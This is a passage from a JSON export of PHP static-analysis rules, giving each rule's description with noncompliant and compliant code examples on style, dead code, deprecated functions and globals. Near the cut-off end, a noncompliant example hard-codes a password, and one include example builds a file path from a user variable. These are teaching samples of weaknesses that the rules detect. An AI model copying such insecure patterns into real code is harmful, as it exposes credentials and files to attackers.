*\/\n $foo->bar(\n $longArgument, \/\/ Compliant; the arguments in the method call are be correctly indented\n $longerArgument,\n $muchLongerArgument\n ); \/\/ Compliant; the closing parenthesis is placed on a separate line\n\n \/* Closures should be declared with a space after the \"function\" keyword,\n * and a space before and after the \"use\" keyword.\n *\/\n $closureWithArgsAndVars = function ($arg1, $arg2) use ($var1, $var2) { \/\/ Compliant; the closure declaration is correctly spaced\n ...\n };\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[{"key":"extends_implements_line","htmlDesc":"Class names, "extends" and "implements" keywords should be located on the same line","defaultValue":"true","type":"BOOLEAN"},{"key":"no_space_method_name","htmlDesc":"There should not be any space after a method name","defaultValue":"true","type":"BOOLEAN"},{"key":"closure_format","htmlDesc":"Closures declaration should be correctly spaced","defaultValue":"true","type":"BOOLEAN"},{"key":"space_comma","htmlDesc":"Commas should be followed by one space and not preceded by any","defaultValue":"true","type":"BOOLEAN"},{"key":"open_curly_brace_classes_functions","htmlDesc":"Open curly braces should be at the beginning of a new line for classes and functions","defaultValue":"true","type":"BOOLEAN"},{"key":"namespace_blank_line","htmlDesc":""namespace" declarations should be followed by a blank line","defaultValue":"true","type":"BOOLEAN"},{"key":"open_curly_brace_control_structures","htmlDesc":"Open curly braces should be at the end of line for control structures","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_after","htmlDesc":"There should be exactly one space between closing parenthesis and opening curly braces","defaultValue":"true","type":"BOOLEAN"},{"key":"interfaces_indentation","htmlDesc":"List of implemented interfaces should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"foreach_space","htmlDesc":"In foreach statement there should be one space before and after "as" keyword and "=>" operator","defaultValue":"true","type":"BOOLEAN"},{"key":"no_space","htmlDesc":"There should not be any space after the opening parenthesis and before the closing parenthesis","defaultValue":"true","type":"BOOLEAN"},{"key":"function_calls_arguments_indentation","htmlDesc":"Arguments in method\/function calls should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"closing_curly_brace","htmlDesc":"Close curly brace and the next "else", "catch" and "finally" keywords should be located on the same line","defaultValue":"true","type":"BOOLEAN"},{"key":"function_declaration_arguments_indentation","htmlDesc":"Arguments in method\/function declarations should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"use_blank_line","htmlDesc":""use" declarations should be followed by a blank line","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_for","htmlDesc":"There should be one space after each ";" in "for" statement","defaultValue":"true","type":"BOOLEAN"},{"key":"use_after_namespace","htmlDesc":""use" declarations should be placed after "namespace" declarations","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_before","htmlDesc":"There should be exactly one space between control structure keyword and opening parenthesis or curly brace","defaultValue":"true","type":"BOOLEAN"}],"type":"CODE_SMELL"},{"key":"php:S1848","repo":"php","name":"Objects should not be created to be dropped immediately without being used","htmlDesc":"<p>There is no good reason to create a new object to not do anything with it. Most of the time, this is due to a missing piece of code and so could\nlead to an unexpected behavior in production.<\/p>\n<p>If it was done on purpose because the constructor has side-effects, then that side-effect code should be moved into a separate, static method and\ncalled directly.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($x < 0) {\n new foo; \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$var = NULL;\nif ($x < 0) {\n $var = new foo;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1862","repo":"php","name":"Related \"if\/else if\" statements and \"cases\" in a \"switch\" should not have the same condition","htmlDesc":"<p>A <code>switch<\/code> and a chain of <code>if<\/code>\/<code>else if<\/code> statements is evaluated from top to bottom. At most, only one branch will\nbe executed: the first one with a condition that evaluates to <code>true<\/code>.<\/p>\n<p>Therefore, duplicating a condition automatically leads to dead code. Usually, this is due to a copy\/paste error. At best, it's simply dead code and\nat worst, it's a bug that is likely to induce further bugs as the code is maintained, and obviously it could lead to unexpected behavior.<\/p>\n<p>For a <code>switch<\/code>, if the first case ends with a <code>break<\/code>, the second case will never be executed, rendering it dead code. Worse\nthere is the risk in this situation that future maintenance will be done on the dead case, rather than on the one that's actually used.<\/p>\n<p>On the other hand, if the first case does not end with a <code>break<\/code>, both cases will be executed, but future maintainers may not notice\nthat.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($param == 1)\n openWindow();\nelse if ($param == 2)\n closeWindow();\nelse if ($param == 1) \/\/ Noncompliant\n moveWindowToTheBackground();\n\n\nswitch($i) {\n case 1:\n \/\/...\n break;\n case 3:\n \/\/...\n break;\n case 1: \/\/ Noncompliant\n \/\/...\n break;\n default:\n \/\/ ...\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($param == 1)\n openWindow();\nelse if ($param == 2)\n closeWindow();\nelse if ($param == 3)\n moveWindowToTheBackground();\n\nswitch($i) {\n case 1:\n \/\/...\n break;\n case 3:\n \/\/...\n break;\n default:\n \/\/ ...\n break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1871","repo":"php","name":"Two branches in the same conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having two <code>cases<\/code> in the same <code>switch<\/code> statement or branches in the same <code>if<\/code> structure with the same\nimplementation is at best duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an\n<code>if<\/code> structure they should be combined, or for a <code>switch<\/code>, one should fall through to the other. <\/p>\n<p>Moreover when the second and third operands of a ternary operator are the same, the operator will always return the same value regardless of the\ncondition. Either the operator itself is pointless, or a mistake was made in coding it.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($i) {\n case 1:\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n case 3: \/\/ Noncompliant; duplicates case 1's implementation\n doSomething();\n break;\n default:\n doTheRest();\n}\n\nif ($a >= 0 && $a < 10) {\n doTheThing();\nelse if ($a >= 10 && $a < 20) {\n doTheOtherThing();\n}\nelse if ($a >= 20 && $a < 50) {\n doTheThing(); \/\/ Noncompliant; duplicates first condition\n}\nelse {\n doTheRest();\n}\n\nif ($b == 0) {\n doOneMoreThing();\n}\nelse {\n doOneMoreThing(); \/\/ Noncompliant; duplicates then-branch\n}\n\nvar b = a ? 12 > 4 : 4; \/\/ Noncompliant; always results in the same value\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($i) {\n case 1:\n case 3:\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n default:\n doTheRest();\n}\n\nif (($a >= 0 && $a < 10) || ($a >= 20 && $a < 50)) {\n doTheThing();\nelse if ($a >= 10 && $a < 20) {\n doTheOtherThing();\n}\nelse {\n doTheRest();\n}\n\ndoOneMoreThing();\n\nb = 4;\n<\/pre>\n<p>or <\/p>\n<pre>\nswitch ($i) {\n case 1:\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n case 3:\n doThirdThing();\n break;\n default:\n doTheRest();\n}\n\nif ($a >= 0 && $a < 10) {\n doTheThing();\nelse if ($a >= 10 && $a < 20) {\n doTheOtherThing();\n}\nelse if ($a >= 20 && $a < 50) {\n doTheThirdThing();\n}\nelse {\n doTheRest();\n}\n\nif ($b == 0) {\n doOneMoreThing();\n}\nelse {\n doTheRest();\n}\n\nint b = a ? 12 > 4 : 8;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1996","repo":"php","name":"Files should contain only one top-level class or interface each","htmlDesc":"<p>A file that grows too much tends to aggregate too many responsibilities and inevitably becomes harder to understand and therefore to maintain. This\nis doubly true for a file with multiple top-level classes and interfaces. It is strongly advised to divide the file into one top-level class or\ninterface per file.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1997","repo":"php","name":"Files should not contain inline HTML","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. To avoid the confusion that can be caused by tangling two coding languages in the\nsame file, inline HTML should be avoided.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\n$name = \"George\";\n?>\n<p> Hello <?php echo $name ?>!<\/p>\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>File having the extension <code>.phtml<\/code> are ignored by this rule because they are expected to have mixed PHP and HTML.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1998","repo":"php","name":"References should not be passed to function calls","htmlDesc":"<p>Passing a reference to a function parameter means that any modifications the method makes to the parameter will be made to the original value as\nwell, since references have the effect of pointing two variables at the same memory space. This feature can be difficult to use correctly,\nparticularly if the callee is not expecting a reference, and the improper use of references in function calls can make code less efficient rather than\nmore efficient. <\/p>\n<p>Further, according to the PHP manual: <\/p>\n<blockquote>\n As of PHP 5.3.0, you will get a warning saying that \"call-time pass-by-reference\" is deprecated... And as of PHP 5.4.0, call-time pass-by-reference\n was removed, so using it will raise a fatal error.\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nmyfun(&$name); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nmyfun($name);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/374\">MITRE, CWE-374<\/a> - Weakness Base Passing Mutable Objects to an Untrusted Method <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2000","repo":"php","name":"Files should not contain characters before \"<?php\"","htmlDesc":"<p>Having characters before <code><?php<\/code> can cause \"Cannot modify header information\" errors and similar problems with Ajax requests.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ntest<?php \/\/Noncompliant\n\/\/ ...\n<\/pre>\n<p>and<\/p>\n<pre>\n\/\/ Noncompliant; newline before opening tag\n<?php\n\/\/ ...\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\n\/\/ ...\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2001","repo":"php","name":"Functions deprecated in PHP 5 should not be used","htmlDesc":"<p>Deprecated language features are those that have been retained temporarily for backward compatibility, but which will eventually be removed from\nthe language. In effect, deprecation announces a grace period to allow the smooth transition from the old features to the new ones. In that period, no\nuse of the deprecated features should be added to the code, and all existing uses should be gradually removed.<\/p>\n<p>The following functions were deprecated in PHP 5:<\/p>\n<table>\n <tbody>\n <tr>\n <th>Deprecated<\/th>\n <th>Use Instead<\/th>\n <\/tr>\n <tr>\n <td><code>call_user_method()<\/code><\/td>\n <td><code>call_user_func()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>call_user_method_array()<\/code><\/td>\n <td><code>call_user_func_array()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>define_syslog_variables()<\/code><\/td>\n <td><\/td>\n <\/tr>\n <tr>\n <td><code>dl()<\/code><\/td>\n <td><\/td>\n <\/tr>\n <tr>\n <td><code>ereg()<\/code><\/td>\n <td><code>preg_match()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>ereg_replace()<\/code><\/td>\n <td><code>preg_replace()<\/code> (note that this is deprecated in PHP 5.5)<\/td>\n <\/tr>\n <tr>\n <td><code>eregi()<\/code><\/td>\n <td><code>preg_match()<\/code> with 'i' modifier<\/td>\n <\/tr>\n <tr>\n <td><code>eregi_replace()<\/code><\/td>\n <td><code>preg_replace()<\/code> with 'i' modifier<\/td>\n <\/tr>\n <tr>\n <td><code>set_magic_quotes_runtime()<\/code> and its alias, <code>magic_quotes_runtime()<\/code><\/td>\n <td><\/td>\n <\/tr>\n <tr>\n <td><code>session_register()<\/code><\/td>\n <td><code>$_SESSION<\/code> superglobal<\/td>\n <\/tr>\n <tr>\n <td><code>session_unregister()<\/code><\/td>\n <td><code>$_SESSION<\/code> superglobal<\/td>\n <\/tr>\n <tr>\n <td><code>session_is_registered()<\/code><\/td>\n <td><code>$_SESSION<\/code> superglobal<\/td>\n <\/tr>\n <tr>\n <td><code>set_socket_blocking()<\/code><\/td>\n <td><code>stream_set_blocking()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>split()<\/code><\/td>\n <td><code>preg_split()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>spliti()<\/code><\/td>\n <td><code>preg_split()<\/code> with 'i' modifier<\/td>\n <\/tr>\n <tr>\n <td><code>sql_regcase()<\/code><\/td>\n <td><\/td>\n <\/tr>\n <tr>\n <td><code>mysql_db_query()<\/code><\/td>\n <td><code>mysql_select_db()<\/code> and <code>mysql_query()<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>mysql_escape_string()<\/code><\/td>\n <td><code>mysql_real_escape_string()<\/code><\/td>\n <\/tr>\n <tr>\n <td>Passing locale category names as strings<\/td>\n <td>Use the LC_* family of constants<\/td>\n <\/tr>\n <\/tbody>\n<\/table>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2002","repo":"php","name":"Errors should not be silenced","htmlDesc":"<p>Just as pain is your body's way of telling you something is wrong, errors are PHP's way of telling you there's something you need to fix. Neither\npain, nor PHP errors should be ignored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n@doSomethingDangerous($password); \/\/ Noncompliant; '@' silences errors from function call\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndoSomethingDangerous($password);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2003","repo":"php","name":"\"require_once\" and \"include_once\" should be used instead of \"require\" and \"include\"","htmlDesc":"<p>At root, <code>require<\/code>, <code>require_once<\/code>, <code>include<\/code>, and <code>include_once<\/code> all perform the same task of\nincluding one file in another. However, the way they perform that task differs, and they should not be used interchangeably.<\/p>\n<p><code>require<\/code> includes a file but generates a fatal error if an error occurs in the process.<\/p>\n<p><code>include<\/code> also includes a file, but generates only a warning if an error occurs.<\/p>\n<p>Predictably, the difference between <code>require<\/code> and <code>require_once<\/code> is the same as the difference between <code>include<\/code>\nand <code>include_once<\/code> - the \"_once\" versions ensure that the specified file is only included once. <\/p>\n<p>Because including the same file multiple times could have unpredictable results, the \"once\" versions are preferred.<\/p>\n<p>Because <code>include_once<\/code> generates only warnings, it should be used only when the file is being included conditionally, i.e. when all\npossible error conditions have been checked beforehand.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ninclude 'code.php'; \/\/Noncompliant; not a \"_once\" usage and not conditional\ninclude $user.'_history.php'; \/\/ Noncompliant\nrequire 'more_code.php'; \/\/ Noncompliant; not a \"_once\" usage\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nrequire_once 'code.php';\nif (is_member($user)) {\n include_once $user.'_history.php';\n}\nrequire_once 'more_code.php';\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2004","repo":"php","name":"Functions should not be nested too deeply","htmlDesc":"<p>Nesting functions can quickly turn your code into \"spaghetti code\". Such code is hard to read, refactor and therefore to maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction f () {\n function f_inner () {\n function f_inner_inner() {\n function f_inner_inner_inner() { \/\/ Noncompliant\n }\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"max","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S2005","repo":"php","name":"String literals should not be concatenated","htmlDesc":"<p>There is no reason to concatenate literal strings. Doing so is an exercise in reducing code readability. Instead, the strings should be\ncombined.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$msg = \"Hello \" . \"${name}\" . \"!\"; \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$msg = \"Hello ${name}!\";\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2007","repo":"php","name":"Functions and variables should not be defined outside of classes","htmlDesc":"<p>Defining and using global variables and global functions, when the convention dictates OOP can be confusing and difficult to use properly for\nmultiple reasons:<\/p>\n<ul>\n <li> You run the risk of name clashes. <\/li>\n <li> Global functions must be stateless, or they can cause difficult-to-track bugs. <\/li>\n <li> Global variables can be updated from anywhere and may no longer hold the value you expect. <\/li>\n <li> It is difficult to properly test classes that use global functions. <\/li>\n<\/ul>\n<p>Instead of being declared globally, such variables and functions should be moved into a class, potentially marked <code>static<\/code>, so they can\nbe used without a class instance. <\/p>\n<p>This rule checks that only object-oriented programming is used and that no functions or procedures are declared outside of a class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\n\n$name = \"Bob\"; \/\/ Noncompliant\n\nfunction doSomething($arg) { \/\/ Noncompliant\n \/\/...\n}\n\nclass MyClass {\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\nclass MyClass {\n\n public static $name = \"Bob\"; \/\/ Compliant\n\n public static function doSomething($arg) { \/\/ Compliant\n \/\/...\n }\n \/\/...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2010","repo":"php","name":"\"&&\" and \"||\" should be used","htmlDesc":"<p>PHP has two sets of logical operators: <code>&&<\/code> \/ <code>||<\/code>, and <code>and<\/code> \/ <code>or<\/code>. The difference between\nthe sets is precedence. Because <code>and<\/code> \/ <code>or<\/code> have a lower precedence than almost any other operator, using them instead of\n<code>&&<\/code> \/ <code>||<\/code> may not have the result you expect.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$have_time = true;\n$have_money = false;\n$take_vacation = $have_time and $have_money; \/\/ Noncompliant. $take_vacation == true.\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$have_time = true;\n$have_money = false;\n$take_vacation = $have_time && $have_money; \/\/ $take_vacation == false.\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2011","repo":"php","name":"\"global\" should not be used","htmlDesc":"<p>Global variables are a useful construct, but they should not be abused. Functions can access the global scope either through the\n<code>global<\/code> keyword or though the <code>$GLOBALS<\/code> array, but these practices considerably reduce the function's readability and\nreusability. Instead, the global variable should be passed as a parameter to the function.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$myGlobalVariable;\n\nfunction foo()\n{\n global $myGlobalVariable; \/\/ Noncompliant\n $GLOBALS['myGlobalVariable']; \/\/ Noncompliant\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo($myStateVariable)\n{\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2014","repo":"php","name":"\"$this\" should not be used in a static context","htmlDesc":"<p><code>$this<\/code> refers to the current class instance. But static methods can be accessed without instantiating the class, and <code>$this<\/code>\nis not available to them. Using <code>$this<\/code> in a static context will result in a fatal error at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Clazz {\n $name=NULL; \/\/ instance variable\n\n public static function foo(){\n if ($this->name != NULL) {\n \/\/ ...\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Clazz {\n $name=NULL; \/\/ instance variable\n\n public static function foo($nameParam){\n if ($nameParam != NULL) {\n \/\/ ...\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2036","repo":"php","name":"Files that define symbols should not cause side-effects","htmlDesc":"<p>Files that define symbols such as classes and variables may be included into many files. Simply performing that inclusion should have no effect on\nthose files other than declaring new symbols. For instance, a file containing a class definition should not also contain side-effects such as\n<code>print<\/code> statements that will be evaluated automatically on inclusion. Logic should be segregated into symbol-only files and\nside-effect-only files. The type of operation which is not allowed in a symbol-definition file includes but is not limited to: <\/p>\n<ul>\n <li> generating output <\/li>\n <li> modifying <code>ini<\/code> settings <\/li>\n <li> emitting errors or exceptions <\/li>\n <li> modifying global or static variables <\/li>\n <li> reading\/writing files <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\n\nprint \"Include worked!\";\n\nclass foo {\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\n\nclass foo {\n\n public function log() {\n print \"Include worked!\";\n }\n\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/www.php-fig.org\/psr\/psr-1\/\">PHP-FIG Basic Coding Standard PSR1<\/a>, 2.3 - Side Effects <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2037","repo":"php","name":"Static members should be referenced with \"static::\"","htmlDesc":"<p>References in a class to static class members (fields or methods) can be made using either <code>self::$var<\/code> or <code>static::$var<\/code>\n(introduced in 5.3). The difference between the two is one of scope. Confusingly, in subclasses, the use of <code>self::<\/code> references the\noriginal definition of the member, i.e. the superclass version, rather than any override at the subclass level. <code>static::<\/code>, on the other\nhand, references the class that was called at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\n\nclass Toy {\n\n public static function status() {\n self::getStatus(); \/\/ Noncompliant; will always print \"Sticks are fun!\" even when called from a subclass which overrides this method;\n }\n\n protected static function getStatus() {\n echo \"Sticks are fun!\";\n }\n}\n\nclass Ball extends Toy {\n\n protected static function getStatus() { \/\/ Doesn't actually get called\n echo \"Balls are fun!\";\n }\n}\n\n$myBall = new Ball();\n$myBall::status(); \/\/ Prints \"Sticks are fun!\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\n\nclass Toy {\n\n public static function status() {\n static::getStatus(); \/\/ Compliant\n }\n\n protected static function getStatus() {\n echo \"Sticks are fun!\";\n }\n}\n\nclass Ball extends Toy {\n\n protected static function getStatus() {\n echo \"Balls are fun!\";\n }\n}\n\n$myBall = new Ball();\n$myBall::status(); \/\/ Prints \"Balls are fun!\"\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>No issue is raised when <code>self<\/code> is used on a constant field, a private field or a private method.<\/p>\n<pre>\nclass A\n{\n private static $somevar = \"hello\";\n const CONSTANT = 42;\n\n private static function foo()\n {\n $var = self::$somevar . self::CONSTANT; \/\/ Should be OK\n self::foo(); \/\/ Should be OK\n }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2038","repo":"php","name":"Colors should be defined in upper case","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. Writing colors in upper case makes them stand out at such, thereby making the\ncode easier to read.<\/p>\n<p>This rule checks that hexadecimal color definitions are written in upper case.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$white = '#ffffff'; \/\/ Noncompliant\n$dkgray = '#006400';\n$aqua = '#00ffff'; \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$white = '#FFFFFF'; \/\/ Compliant\n$dkgray = '#006400';\n$aqua = '#00FFFF'; \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2041","repo":"php","name":"Parentheses should not be used for calls to \"echo\"","htmlDesc":"<p><code>echo<\/code> can be called with or without parentheses, but it is best practice to leave parentheses off the call because using parentheses\nwith multiple arguments will result in a parse error.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\necho(\"Hello\"); \/\/ Noncompliant, but it works\necho(\"Hello\", \"World\"); \/\/ Noncompliant. Parse error\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\necho \"Hello\";\necho \"Hello\",\"World!\";\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2043","repo":"php","name":"Superglobals should not be accessed directly","htmlDesc":"<p>Superglobal variables are predefined variables available in all scopes throughout a script. However, accessing them directly is considered bad\npractice. Instead, they should be accessed through an object or framework that handles sanitation and validation.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$name = $_POST['name'];\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$name = $this->params()->fromPost('name');\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2044","repo":"php","name":"\"php_sapi_name()\" should not be used","htmlDesc":"<p>Both <code>php_sapi_name()<\/code> and the <code>PHP_SAPI<\/code> constant give the same value. But calling the method is less efficient that simply\nreferencing the constant. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (php_sapi_name() == 'test') { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (PHP_SAPI == 'test') { ... }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2046","repo":"php","name":"Perl-style comments should not be used","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. This rule flags all Perl-style comments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$myvar; # Noncompliant; this comment should have started with \"\/\/\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$myvar; \/\/ Compliant; this comment started with \"\/\/\"\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2047","repo":"php","name":"The names of methods with boolean return values should start with \"is\" or \"has\"","htmlDesc":"<p>Well-named functions can allow the users of your code to understand at a glance what to expect from the function - even before reading the\ndocumentation. Toward that end, methods returning a boolean property should have names that start with \"is\" or \"has\" rather than with \"get\".<\/p>\n<p>Note that this rule will only apply to functions that are documented to return a boolean.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/**\n * @return boolean\n *\/\npublic function getFoo() \/\/ Noncompliant\n{\n return foo;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/**\n * @return boolean\n *\/\npublic function isFoo()\n{\n return true;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2050","repo":"php","name":"Alias functions should not be used","htmlDesc":"<p>Certain functions exist in PHP only as aliases of other functions. These aliases have been made available for backward compatibility, but should\nreally be removed from code. <\/p>\n<p>This rule looks for uses of the following aliases:<\/p>\n<table>\n <tbody>\n <tr>\n <th>Alias<\/th>\n <th>Replacement<\/th>\n <\/tr>\n <tr>\n <td><code>chop<\/code><\/td>\n <td><code>rtrim<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>close<\/code><\/td>\n <td><code>closedir<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>doubleval<\/code><\/td>\n <td><code>floatval<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>fputs<\/code><\/td>\n <td><code>fwrite<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>ini_alter<\/code><\/td>\n <td><code>ini_set<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_double<\/code><\/td>\n <td><code>is_float<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_integer<\/code><\/td>\n <td><code>is_int<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_long<\/code><\/td>\n <td><code>is_int<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_real<\/code><\/td>\n <td><code>is_float<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_writeable<\/code><\/td>\n <td><code>is_writable<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>join<\/code><\/td>\n <td><code>implode<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>key_exists<\/code><\/td>\n <td><code>array_key_exists<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>magic_quotes_runtime<\/code><\/td>\n <td><code>set_magic_quotes_runtime<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>pos<\/code><\/td>\n <td><code>current<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>show_source<\/code><\/td>\n <td><code>highlight_file<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>sizeof<\/code><\/td>\n <td><code>count<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>strchr<\/code><\/td>\n <td><code>strstr<\/code><\/td>\n <\/tr>\n <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$arr=array(\"apple\", \"pear\",\"banana\");\necho sizeof($arr); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$arr=array(\"apple\", \"pear\",\"banana\");\necho count($arr);\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2068","repo":"php","name":"Credentials should not be hard-coded","htmlDesc":"<p>Because it is easy to extract strings from a compiled application, credentials should never be hard-coded. Do so, and they're almost guaranteed to\nend up in the hands of an attacker. This is particularly true for applications that are distributed.<\/p>\n<p>Credentials should be stored outside of the code in a strongly-protected encrypted configuration file or database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$uname = \"steve\";\n$password = \"blue\";\nconnect($uname, 